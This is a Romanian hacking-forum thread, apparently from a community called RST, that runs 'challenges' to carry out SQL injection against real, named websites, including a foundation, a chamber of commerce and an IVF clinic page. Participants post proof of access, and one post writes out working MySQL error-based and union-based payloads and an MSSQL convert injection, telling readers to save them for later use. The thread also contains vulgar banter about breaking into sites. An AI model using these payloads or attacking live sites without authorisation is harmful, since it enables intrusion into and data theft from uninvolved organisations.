Sheyken

Trecut la lista de solvers. O sa vina FBI-u dupa tine pentru ca ai vazut baza de date.

I'm lazy ...

Iti place sa o bagi toata a? Adaugat la lista de solvers.

Eu in locul tau m-as duce la un netcafe, si mi-as baga pula in ea recompensa.

Dragii mei "Challengeisti" prin postarea acestui challenge, ma voi retrage pentru un anumit timp din aceasta categorie. De ce ? [ Pentru ca nu mai am site-uri vulnerabile. ] O sa mai caut si voi reveni sa facem alte challenge-uri. ----------------------------------------------------------- [+]Target: Fundación Antena 3 [+]Document: Oracle XML Injection [+]Image: Cerinte: --------------------------- Sintaxa se trimite prin PM Postarea unui ScreenShoot este obligatorie Pentru rezolvarea acestui challenge este necesar sa postati versiunea bazei de date. --------------------------- Solvers: DarkyAngel [ # 1 ] totti93 [ # 2 ] Wubi [ # 3 ] caramea [ # 4 ] ____ | __ ) ___ _ __ _ _ ___ | _ \ / _ \| '_ \| | | / __| | |_) | (_) | | | | |_| \__ \ |____/ \___/|_| |_|\__,_|___/ M-am gandit ca, odata cu terminarea primei "sesiuni" de challenge-uri sa postez rezolvarile de la challenge-urile trecute. Challenge 1 https://rstcenter.com/forum/56878-medium-hard-mysql-injection-challenge.rst Sintaxa: News | Puerto Rico Islanders or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 -- [ MySQL Injection Error Based ]. ----------------------------------------------------------------------- Challenge 2 https://rstcenter.com/forum/57020-easy-medium-mysql-injection-challenge.rst Sintaxa se putea face de 2 feluri. Error based & Union based. Error based -> SIGMA or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 -- Union Based -> SIGMA and 1=2 union select 1,2,3,4,5,6,7,8,9,10,version(),12,13 /* --------------------------------------------------- Challenge 3 https://rstcenter.com/forum/57037-medium-hard-sql-injection-challenge.rst Aici mai mult e funny si putina logica. Doar 3 au reusit sa rezolve acest challenge. Explicatia: Arabi atunci cand adaugati apostroful langa ?id=2 va apare urmatoarea erroare -> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\')' at line 1 SQL: SELECT * FROM `spsinglepage` WHERE (`id` = 2\') Numarul de coloane il veti afla prin urmatorul query -> Arabi and (select * from spsinglepage)=(select 1) [B][COLOR="#00FF00"]Operand should contain 8 column(s)[/COLOR][/B] SQL: SELECT * FROM `spsinglepage` WHERE (`id` = 2 and (select * from spsinglepage)=(select 1)) Si asa, injectia se face in felul urmator -> Arabi) union (select 1,2,3,4,5,6,7,8 ----------------------------------------------------- Challenge 4 https://rstcenter.com/forum/57056-easy-medium-mssql-injection-challenge.rst Sintaxa: Bradford Chamber | News or 1=convert(int,(@@version))-- Sintaxa facut de totti93 [ union based ] --> Bradford Chamber | News ----------------------------------------------------- Pe final as dori ca voi, sa va notati aceste sintaxe, undeva in pc pentru ca azi ati invatat ceva nou [majoritatea] de aceste sintaxe veti avea nevoie in viitor [ poate va intalniti cu o problema, iar una din sintaxele de mai sus este cheia rezolvari ]. Am sa incerc sa revin cu noi provocari. Va multumesc pentru rabdarea pe care ati avut-o.

Atata timp cat le-ai rezolvat pe aproape toate, nu te poti pierde. Fii atent la numele thread-ului. "MSSQL". gata acum nu te mai pierzi !

ON: Felicitari, inca 3 solvers. OFF: Unde esti tu Denjackere !?

Felicitari, esti primul care a rezolvat acest challenge. Ai fost trecut la lista de Solvers.

Felicitari lui totti93, si Wubi. Ati fost trecuti pe lista de Solvers.

M-am gandit sa lasam MySQL deoparte si sa trecem la alt tip SQL. Azi voi face un challenge MSSQL injection. ------------------------------------------------------------------------ [+]Target: Bradford Chamber | News [+]Document: MSSQL Injection [+]Image: Cerinte: --------------------------- Sintaxa se trimite prin PM Postarea unui ScreenShoot este obligatorie Pentru rezolvarea acestui challenge este necesar sa postati versiunea bazei de date. --------------------------- Solvers: wHoIS fallen_angel Alexutzu_mac Wubi totti93 GraphLog caramea florin_darck FreddieTux ... Will be edited.

Hint-uri ati primit: Union based.

Multumesc, da am dat cateva ture.

Cred ca au fost destule rezolvari. Ma asteptam sa raspunzi si tu.

@denjacker - Ce iti mai place sintaxa aia :>

[+]Target: http://www.janeen-ivf.org/page.php?id=2 [+]Document: MySQL Injection [+]Method: Union Based [+]Image: Cerinte: --------------------------- Sintaxa se trimite prin PM Postarea unui ScreenShoot este obligatorie Pentru rezolvarea acestui challenge este necesar sa postati versiunea bazei de date. --------------------------- Solvers: denjacker totti93 Wubi ... Will be edited.

Ultimul solver: caramea Challengeu' se incheie: Puteati sa il rezolvati in mai multe modalitati: Error based. Union based. Syntax error based -> or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 -- Syntax Union based -> and 1=2 union select 1,2,3,4,5,6,7,8,9,10,version(),12,13 /* Notativile intr-un New Text Document pentru ca veti avea nevoie de aceste Syntaxe pe viitor. // Challenge inchis. // 6 Solvers

Era doar o gluma, observa ca am pus ideea in ghilimele " ". Next !?

Ai fost trecut in lista. "Nu uita, in BackTrack odata logat in userul Root nu mai folosi sudo apt-get update, foloseste apt-get update" pentru tine Wubi

Felicitari wHoIS esti al 2 lea care a reusit sa rezolve acest challenge prin metoda Union Based. Ai fost adaugat in lista de solvers.

Al 3 lea pm a fost trimis de catre: GraphLog GraphLog, a fost adaugat la lista -> Solvers.

Felicitari, esti primul care a rezolvat acest challenge. Next ?!

[+]Target: SIGMA [+]Document: MySQL Injection [+]Image: Cerinte: --------------------------- Sintaxa se trimite prin PM Postarea unui ScreenShoot este obligatorie Pentru rezolvarea acestui challenge este necesar sa postati versiunea bazei de date. --------------------------- Solvers: fallen_angel - Error based DarkyAngel - Union Based GraphLog - Error based wHoIS - Union Based Wubi - Union Based caramea - Union Based Sho0ter - --- ... Will be edited

Pai cum sa nu se uite la pornache? Se plang la sefii lor ca au reparat gaurile de securitate dupa vine unu nebun si i fute, si ei? Watching pornache.

@ps-axl, a fost o intrebare simpla, nu am voie sa accesez un domeniu guvernamental, atunci pentru ce a mai fost facut? A spus cineva ca vreau/vrem sa atacam domeni guvernamentale? A spus cineva ca sunt deala "greu" ? A spus cineva ca ma folosesc de P-O-S doar sa sparg ? De ce trebuie sa sariti cu gura inainte sa analizati situatia ?

@florin_darck, multumesc foarte mult. Like !